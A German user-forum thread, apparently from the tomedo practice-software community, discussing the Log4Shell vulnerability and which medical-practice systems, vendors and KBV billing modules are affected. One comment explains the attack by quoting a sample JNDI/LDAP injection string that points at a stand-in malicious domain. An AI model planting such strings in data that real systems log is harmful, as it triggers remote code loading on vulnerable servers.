Kritische Zero-Day-Lücke in Log4j gefährdet zahlreiche Server und Apps

Question

Liebe Nutzer,

aktuell gibt es wieder einmal eine Sicherheitslücke, die man nicht auf die leichte Schulter nehmen sollte:

Aus dem Nachrichtenartikel bei Heise:
Apple, Twitter, Amazon und tausende andere Dienste sind anfällig; erste Angriffe laufen bereits.

Artikel bei heise.de

Mit bestem Gruß

Axel Tubbesing

tubbeTEC GmbH

Comments

was muss / kann ich denn als kleiner Endnutzer in einer Praxis mit Macs und tomedo machen?

Da ja nicht alle Mac Updates gleich aufgespielt werden sollen, würde ich mich freuen, wenn jemand sagen kann, welches update sein soll und welches (ggf. auch OS) nicht sein muss/darf/soll.

Vielen Dank.

Answer 1

Liebe Nutzerinnen und Nutzer,

wir analysieren derzeit mit Hochdruck unsere Systeme. Auf https://tomedo.de/log4jshell/ können Sie sich ab jetzt jederzeit über den aktuellen Stand informieren - die Seite wird von uns täglich mindestens 2x aktualisiert.

Comments

Vorbildlich. Herzlichen Dank!

---

Vielen Dank für die aktuellen Informationen.

Bei solch wichtigen Themen wie der Abschaltung des KIM Moduls aufgrund einer möglichen Bedrohung, möchte ich vorschlagen, dass Ihre Kunden auch per Mail informiert werden. Ich habe nur zufällig ins Forum geschaut. Eine als "wichtig" gekennzeichnete Mail kommt im Praxisalltag schneller an.

Unser Labor-Dienstleister on-lab hat auf meine Nachfrage mitgeteilt, dass deren Software nicht betroffen ist.

Answer 2

Hallo Herr Tubbesing,

herzlichen Dank für den Hinweis, ich habe den Heise Artikel gelesen aber nur verstanden, dass es "jeden treffen kann"?

Wären Sie so gut und ein kurzes Statement zu schreiben, wo genau die Gefahr liegt bzw. wo man besonders achtsam sein sollte.

Kommt der Angriff "einfach so"? Ist es ein spezielles Programm/Datei die (versehentlich) ausgeführt wird? Ein Download/Webseitenbesuch? Reicht der normale Virenschutz/Tomedo Security Paket, eine gute Firewall oder hat es damit gar nichts zu tun... Muss/soll man Java updaten (oder nicht?) - Kommt das in Tomedo/ImpfdocNT vor?

Herzlichen Dank schonmal im Vorraus!

Viele Grüße!

Christian Schröter

Comments

https://fachportal.gematik.de/ti-status

Einige TI Systeme sind down. Irgendwie sehe ich parallelen zu Covid. Auch da ist eine fiktive SARS Pandemie nicht zu Ende gedacht worden. Vor Grenz- und Landeschliessungen wurde das Papier beendet, die letzten Konsequenzen nicht bedacht. Da mir schon mal der Knebelvertrag mit der KV schon mal dank Tomedo näher gebracht wurde, bin ich bei der TI Mitläufer und mache was ich muss. Auch hier wird nicht überlegt was passiert wenn das System mal deutschlandweit die Grätsche macht. Funktioniert die TI nicht haben wir unbeschreiblich viel Mehrarbeit als vor der TI.

Jetzt mal abgesehen von der Gefahr für die Praxis durch die Java Schwachstelle sollte das Augen hoffentlich  öffnen. Ich bin da nicht so sicher.

---

Hallo Herr Dr. Schröter,

ich habe mal das Wochenende abgewartet, damit ich Ihnen (und hier im Forum) einen sachlichen und kompetenten Kommentar geben kann. In den Medien gibt es inzwischen überall Berichte, die aber vielfach nur Kopien der ersten Meldung sind.

Sie haben die Antwort von Herrn Zollmann gelesen, für die Software tomedo besteht wohl kein Handlungsbedarf, Sie haben den Hinweis von Herrn Dr. Barlogh gesehen, die TI ist, neben vielen anderen Systemen betroffen, was meine erste Position untermauert und ich habe Ihnen noch einen Link zu einem Artikel aus dem Handelsblatt hier eingefügt.

Das Problem ist, dass eigentlich überall heute etwas Java Code als Sprache / Tool / Schnittstelle benutzt wird und man gerade nicht im Detail abschätzen kann, welche Folgen diese Sicherheitslücke noch haben wird. Von der Firma F-Secure wird darauf hingewiesen, dass unter Umständen auch QR-Code Scanner oder Funkschließanlagen betroffen sein können.

Wenn Herr Zollmann darauf hinweist, dass die Praxen - "sich somit in jedem Fall (hier und auch unabhängig von dem konkreten Fall jetzt), sich noch mal bzw. regelmäßig mit dem Thema "Sicherheit in Ihrem Praxisnetzwerk" - bechäftigen sollten, zeigt, das im Umkehrschluss auch auf, dass dieses durch die Firma Zollsoft GmbH nicht erfolgen wird, hier ist klar jede Praxis für sich gefordert.

Wenn ich nun die Liste der betroffenen Systeme durchgehe, dann fallen mir für den Bereich tomedo die Produkte Unify und VMware auf, denn Produkte dieser Hersteller sind in vielen Praxen installiert und eingerichtet. Leider habe ich noch keine Antwort von Medset, Padsy ist komplett in Java geschrieben, ebenso wie die meisten OrderEntry Systeme der Labore. Gerade die Systeme, die aus der Praxis heraus Verbindungen zu anderen Servern im Internet aufbauen, sollten dringend mit Updates bedacht werden.

Update aus dem WEB: Hinweise auf Heise.de (betroffen sind auch ESET, BitDefender, Citrix, Debian, Docker, Salesforce, Sophos, Ubuntu, Veeam).

Hier zeigt sich aber auch das Dilemma für die einzelne Praxis, gesetzt den Fall, dass eine Hardwarefirewall und die entsprechende Sicherheitstechnik vorhanden ist, so kommt es jetzt doch darauf an, dass die Hersteller kurzfristig Updates zur Verfügung stellen.

Für uns, als tubbeTEC GmbH kann ich nur sagen, dass wir am Samstag angefangen haben, die die Systeme unserer Kunden weiter abzusichern und zu schauen, wo es schon Updates und Handlungsanweisungen gibt.

Mit bestem Gruß aus Bielefeld

Axel Tubbesing
tubbeTEC GmbH

 

 

---

Lieber Herr Tubbesing,

heißt also eine Hardwarefirewall gibt dem Käufer ein ruhiges Gefühl, aber vermeidet den Angriff nicht.

Viele Grüße aus Berlin

---

Wir bei TubbeTEC. Applaus! Ich verstehe nicht warum sie das immer machen. Danke für den Heise Link, nach dessen Lektüre ist aber nicht klar was zu tun ist. Den Stecker komplett ziehen kann man nicht mehr.

 

Ich würde gerne Johannes Müller zu dem Thema gerne hören, ich denke der hat von IT hier im Forum am meisten Ahnung,

---

Segostar nicht betroffen, kein Java in der gesammten kontrollierten Umgebung, gerade angefragt.

---

Softwareliste: https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

Lancom, Synology DSM nicht betroffen Docker auch nicht oder nicht mehr.

---

Herzlichen Dank Herr Tubbesing,

ich verstehe nun ca. 5% mehr, bin aber sehr dankbar für Ihre Ausführungen!

Herzliche Grüße!

Christian Schröter

---

Danke für die Blumen :P - aber ich war jetzt 3 Tage beim Skifahren und lasse das Ganze langsam angehen. Bisher wurden noch keine konkreten Angriffe gefahren. Die Lücken werden jetzt (von denen die es können .. und das werden noch nicht viele sein) genutzt um sich in Systeme wie die icloud einzuhacken. Bis das durchschnittliche Scriptkiddie auf die Jagd nach offenen Lücken geht müssten die meisten unserer Systeme gepatched sein.

Answer 3

Der tomedo-Server verwendet keine der betroffenen log4j-Versionen und sollte somit von der Lücke nicht betroffen sein. Auch ältere tomedo-Versionen sind nicht betroffen (zumindest die Versionen der letzten zwei Jahre nicht, weiter habe ich jetzt nicht zurück geschaut, aber ich hoffe es gibt keine Praxis die seit zwei Jahren kein Update mehr gemacht hat). Hier besteht also aus unserer Sicht aktuell kein Grund zur Sorge. Dennoch empfiehlt es sich natürlich, den tomedo-Server stets auf einem aktuellen Stand zu halten.

Für andere (externe) Programme, die in den Praxen genutzt werden, können wir natürlich keine verlässliche Aussage treffen. Grundsätzlich setzt der Angriff aber nach meinem Verständnis vorraus, dass der Server bzw. die Anwendung entweder aus dem Internet erreichbar sind (was hoffentlich im Kontext von Praxissoftware ohnehin nicht der Fall sein sollte), oder aber, dass ein eventueller Angreifer bereits Zugang zu Ihrem Praxisnetzwerk hat (was ihm in den meisten Fällen vermutlich noch deutlich größere Angriffspunkte, als die genannte Logging-Bibliothek bieten würde). Es empfiehlt sich somit in jedem Fall (hier und auch unabhängig von dem konkreten Fall jetzt), sich noch mal bzw. regelmäßig mit dem Thema "Sicherheit in Ihrem Praxisnetzwerk" zu beschäftigen.

Comments

Zitat: Es empfiehlt sich somit in jedem Fall (hier und auch unabhängig von dem konkreten Fall jetzt), sich noch mal bzw. regelmäßig mit dem Thema "Sicherheit in Ihrem Praxisnetzwerk" zu beschäftigen.

Lieber Herr Zollmann,

das ist so, als würde man seinen Patienten sagen, es sei etwas Ernstes mit ihm und er solle sich nochmal ernstlich mit seiner Gesundheit beschäftigen.

Die Antwort des Patienten: "Häh?"

---

Hallo,

 

scheinbar ist Docker betroffen. Die Tomedo-Spracherkennung läuft darin. Gibt es was, was man tun muss?

 

Gruß

 

-js

---

Docker ist nach unserem Kenntnisstand selbst nicht betroffen. Die Container können aber natürlich betroffen sein.

Unsere Spracherkennung läuft aber in möglichst schlanken Debian-Containern. Ein Test dieser Images hat keine Abhängigkeiten von Log4j gefunden. Sie müssen also nichts tun.

Beachten Sie aber bitte, dass diese Aussage ausschließlich für die tomedo-Spracherkennung gilt. Zu eventuell weiteren (fremden) Containern kann ich nichts sagen.

Answer 4

Ein Hinweis aus einem Newsletter: "HINWEIS: Da die KBV-Prüfmodule von der kritischen Schwachstelle betroffen sind, sollten Anwender bis auf Weiteres keine Abrechnungen durchführen. Erst wenn die KBV den Austausch der Log4j-Bibliotheken erfolgreich abgeschlossen hat, können wir das Update in unsere Anwendung integrieren und Ihnen die gewohnte Funktionalität zur Verfügung stellen. Ebenso empfehlen wir, aktuell keine E-Rezepte über den IT-Dienstleister eHealth-Tec zu erstellen, da die Clientmodule des Unternehmens ebenfalls von der Sicherheitslücke betroffen sind. "

Comments

Die KVB ist ja mal echt lustig.... gut das es so offen kommuniziert wird und es "alle" mitbekommen.

Herzlichen Dank für die Info!

---

EcoDMS nicht betroffen

https://www.ecodms.de/index.php/de/presse-news/pressemitteilungen/news/1491-unsere-software-loesungen-sind-von-dem-aktuellen-log4j-exploit-cve-2021-44228-nicht-betroffen

---

Die KVN schreibt noch nichts dergleichen (Stand 15.12. 9:15h) ... schreibt da jeder unterschiedliche Prüfmodule oder sind die nur langsamer?

---

Zur Einordnung in welchem Szenario das KBV-Prüfmodul nach meinem laienhaften Dafürhalten (ich bin mit dem Thema auf zollsoft-Seite in keiner Weise betraut) ein Sicherheitleck aufweist: 

1.) In Ihren Abrechnungsdaten (den sichtbaren Daten im Programm, sowas wie Versichertennummer, Patientenname auf der Karte oder Abrechnungsziffer) gibt es eine Zeichenkette der Form jndi:ldap://boese-domain.de/..

2. ) Das Prüfmodul loggt diese korrumpierten Abrechnungsdaten in seinem log-File. Im Normalfall werden im KBV-Prüfmodul nach meinem Kenntnisstand keine patienten/abrechnungsbezogenen Daten geloggt, sondern nur Statusmeldungen (s. Anhang). Ganz genau kann das aber nur die KBV wissen.

Das soll jetzt nicht verharmlosend klingen, sondern nur der Einordnung dienen, welche Nebenebedingungen es benötigt, damit beim Erstellen der Abrechnung - also der Ausführung des aktuellen (bald von uns geupdateten) Prüfmoduls - ein Angriff geschehen kann.

Answer 5

Aktueller Twitter der KBV

https://twitter.com/i/web/status/1471023604531965952

 

Offenbar brauchen wir vor der Quartalsabrechnung noch ein neues Update! 

Comments

Zollsoft hat es auch nicht einfach mit denen.